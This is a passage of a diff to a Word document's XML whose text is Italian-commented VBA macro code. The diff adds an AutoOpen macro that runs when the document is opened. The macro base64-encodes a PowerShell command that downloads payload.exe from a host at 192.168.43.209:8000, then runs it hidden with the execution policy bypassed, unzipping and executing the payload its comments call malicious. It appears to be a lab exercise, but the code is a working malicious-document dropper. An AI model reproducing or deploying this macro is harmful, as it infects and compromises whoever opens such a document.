+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Function</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>' Converte una stringa in input in dati binari</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Function </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>stringaABinario</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(s As String) As Variant</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Dim ado As Object</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Set ado = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>CreateObject</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>("</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ADODB.Stream</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ado.Type</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = 2 ' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>adTypeText</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ado.Charset</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = "us-ascii"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ado.Open</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ado.WriteText</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> s</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ado.Position</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = 0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ado.Type</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = 1 ' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>adTypeBinary</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>stringaABinario</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -752,419 +1157,19 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>objXML.createElement</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>("b64")</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
+        <w:t>ado.Read</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>' Imposta il testo del nodo con il comando da codificare</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>objNode.dataType</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = "bin.base64"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>objNode.nodeTypedValue</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>stringaABinario</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>str</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    ' Restituisci il risultato della codifica base64</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    EncodeBase64 = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>objNode.text</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    ' Libera l'oggetto XML</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Set </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>objNode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = Nothing</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    Set </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>objXML</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = Nothing</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">End </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>Function</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>' Converte una stringa in input in dati binari</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Function </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>stringaABinario</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>s As String) As Variant</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    Dim ado As Object</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    Set ado = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>CreateObject</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>"</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ADODB.Stream</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>")</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>ado.Type</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = 2 ' </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>adTypeText</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>ado.Charset</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = "us-ascii"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>ado.Open</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>ado.WriteText</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> s</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>ado.Position</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = 0</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>ado.Type</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = 1 ' </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>adTypeBinary</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>stringaABinario</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>ado.Read</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>ado.Close</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -1239,6 +1244,586 @@
         <w:rPr>
           <w:lang w:val="it-IT"/>
         </w:rPr>
+        <w:t>Sub AutoOpen()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codificato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Dim codificato2 As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Dim comandoBase64 As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comandoDaEseguire</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Dim comandoDaEseguire2 As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Dim shell As Object</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Set shell = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>VBA.CreateObject</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>("</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>WScript.Shell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>' comando per scaricare il file malevolo</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codificato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = EncodeBase64("(New-Object </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Net.WebClient</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>).</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>DownloadFile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>('" &amp; "http://192.168.43.209:8000/payload.exe" &amp; "', '" &amp; "C:\Users\</w:t>
+      </w:r>
+      <w:r>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:r>
+        <w:t>\Downloads\</w:t>
+      </w:r>
+      <w:r>
+        <w:t>payload.zip</w:t>
+      </w:r>
+      <w:r>
+        <w:t>" &amp; "')")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>' comando per eseguire il file malevolo</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:t>codificato2 = EncodeBase64(" &amp; 'C:\Users\</w:t>
+      </w:r>
+      <w:r>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:r>
+        <w:t>\Downloads\</w:t>
+      </w:r>
+      <w:r>
+        <w:t>payload</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.exe'")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' Comando </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> codificato in base64</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:t>comandoBase64 = "IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('BASE64_ENCODED_COMMAND')))"</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>' decodifico i due comandi da base64 a normali</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>comandoDaEseguire</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Replace</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>(comandoBase64, "BASE64_ENCODED_COMMAND", codificato)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    comandoDaEseguire2 = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Replace</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>(comandoBase64, "BASE64_ENCODED_COMMAND", codificato2)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    ' Esegui il comando </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> per scaricare il file malevolo</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>shell.Run</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> "powershell.exe -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>NoProfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ExecutionPolicy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Bypass -Command " &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comandoDaEseguire</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, 0, True</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Call </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>unzip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>'estraggo il payload</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' Esegui il comando </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> per eseguire il file malevolo</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>shell.Run</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> "powershell.exe -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>NoProfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ExecutionPolicy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Bypass -Command " &amp; comandoDaEseguire2, 0, True</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' </w:t>
+      </w:r>
